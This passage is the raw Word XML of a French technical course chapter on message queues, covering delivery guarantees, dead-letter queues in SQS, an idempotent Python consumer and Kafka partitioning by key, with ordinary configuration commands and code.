              <w:t>46. Messagerie et files d'attente · 47. Tests de charge et performance · 48. Résilience : sauvegardes et reprise après sinistre · 49. FinOps : maîtriser le coût du cloud · 50. Plateforme interne et chemins d'or · 51. Sécurité de la chaîne logicielle · 52. Durcissement des conteneurs et du cluster · 53. Journalisation, audit et conservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>85. Messagerie et files d'attente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Découpler les services par des messages, sans perdre ni dupliquer le travail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Avancé · Prérequis : chapitre 84</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Distinguer file et journal d'événements.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Choisir une garantie de livraison.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Concevoir un consommateur idempotent.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Gérer l'ordre et les messages toxiques.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Exploiter une file en production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>85.1 Pourquoi un intermédiaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un appel direct entre deux services couple leur disponibilité : si le destinataire est lent ou arrêté, l'appelant attend ou échoue. Une file interpose un stockage durable qui absorbe les pics et découple les rythmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="99" name="Picture 99"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f97.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.97 — Appel direct et message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.329 — Quatre besoins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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Distribuer des tâches</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File de travail</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SQS, RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Diffuser un événement</w:t>
            </w:r>
          </w:p>
        </w:tc>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Journal</w:t>
            </w:r>
          </w:p>
        </w:tc>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Kafka, Kinesis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Différer un traitement</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File avec délai</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SQS délai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Ordonner par clé</w:t>
            </w:r>
          </w:p>
        </w:tc>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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>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Kafka, SQS FIFO</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JOURNAL D'ÉVÉNEMENTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Suite ordonnée et persistante d'enregistrements que plusieurs consommateurs peuvent lire à leur propre position. Les messages ne disparaissent pas à la lecture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>85.2 Garanties de livraison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Aucun système distribué ne garantit exactement une fois sans coût important. En pratique, on choisit au moins une fois et on rend le traitement idempotent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.330 — Trois garanties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83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Garantie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Au plus une fois</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Perte de message</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Métriques, journaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Au moins une fois</w:t>
            </w:r>
          </w:p>
        </w:tc>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Doublon</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Paiement, commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exactement une fois</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Coût et complexité</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Cas particulier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une file protégée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Politique de réessai avec file de lettres mortes (SQS)</w:t>
        <w:br/>
        <w:t>aws sqs create-queue --queue-name commandes \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --attributes '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "VisibilityTimeout": "60",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "MessageRetentionPeriod": "1209600",</w:t>
        <w:br/>
        <w:t>"RedrivePolicy":</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "{\"deadLetterTargetArn\":\"arn:aws:sqs:eu-west-3:123456789012:commandes-dlq\",\"maxReceiveCount\":\"5\"}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Consommation par lots</w:t>
        <w:br/>
        <w:t>aws sqs receive-message --queue-url "$URL" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --max-number-of-messages 10 --wait-time-seconds 20</w:t>
      </w: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MESSAGE TOXIQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Message qu'un consommateur ne parvient jamais à traiter. Sans limite de réessai, il bloque la file indéfiniment.</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UN MESSAGE TOXIQUE BLOQUE UNE FILE ORDONNÉE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Sur une file FIFO, un message en échec empêche la progression de tous les messages suivants de la même clé. La limite de réception et la file de lettres mortes sont obligatoires.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>85.3 Consommateur idempotent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un consommateur peut recevoir deux fois le même message : après un délai de visibilité expiré, après un redémarrage, après un réessai. Chaque traitement doit être rejouable sans effet supplémentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une clé d'idempotence en base · python</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import json, os, psycopg</w:t>
        <w:br/>
        <w:br/>
        <w:t>def traiter(message):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    corps = json.loads(message["Body"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cle = corps["idempotency_key"]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    with psycopg.connect(os.environ["DATABASE_URL"]) as conn:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with conn.cursor() as cur:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            cur.execute(</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "INSERT INTO traitements (cle) VALUES (%s) "</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "ON CONFLICT (cle) DO NOTHING RETURNING cle",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                (cle,),</w:t>
        <w:br/>
        <w:t xml:space="preserve">            )</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if cur.fetchone() is None:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                return "deja_traite"          # doublon ignoré</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">            cur.execute(</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "UPDATE commandes SET statut = 'payee' WHERE id = %s",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                (corps["commande_id"],),</w:t>
        <w:br/>
        <w:t xml:space="preserve">            )</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "traite"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.331 — Quatre stratégies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09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Stratégie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clé unique en base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Relationnelle</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Écriture supplémentaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Verrou distribué</w:t>
            </w:r>
          </w:p>
        </w:tc>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Redis</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Expiration à régler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toute base</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Nécessite un modèle clair</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Déduplication par empreinte</w:t>
            </w:r>
          </w:p>
        </w:tc>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Journal</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Fenêtre limitée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ACQUITTEZ APRÈS LE TRAITEMENT, JAMAIS AVANT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Supprimer le message dès sa réception fait perdre le travail en cas de plantage. L'accusé de réception doit suivre l'écriture effective, même s'il en résulte parfois un doublon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>85.4 Ordre et partitionnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'ordre global coûte cher : il impose un seul consommateur. En pratique, on garantit l'ordre par clé métier — une commande, un compte — grâce au partitionnement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un ordre par clé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Producteur Kafka : la clé détermine la partition</w:t>
        <w:br/>
        <w:t>kafka-console-producer --topic commandes \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --property "parse.key=true" --property "key.separator=:" &lt;&lt;'EOF'</w:t>
        <w:br/>
        <w:t>CMD-1001:{"etape":"creee"}</w:t>
        <w:br/>
        <w:t>CMD-1001:{"etape":"payee"}</w:t>
        <w:br/>
        <w:t>CMD-1002:{"etape":"creee"}</w:t>
        <w:br/>
        <w:t>EOF</w:t>
        <w:br/>
        <w:br/>
        <w:t># Consommation d'un groupe, décalage visible</w:t>
        <w:br/>
        <w:t>kafka-consumer-groups --bootstrap-server localhost:9092 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --describe --group paiements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.332 — Quatre conséquences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87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Contrainte</w:t>
            </w:r>
          </w:p>
        </w:tc>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Conséquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordre global</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Un seul consommateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À éviter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Ordre par clé</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Parallélisme par partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Clé métier stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rejeu</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Position conservée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rétention suffisante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Débit</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Plus de partitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Coût de coordination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="100" name="Picture 100"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
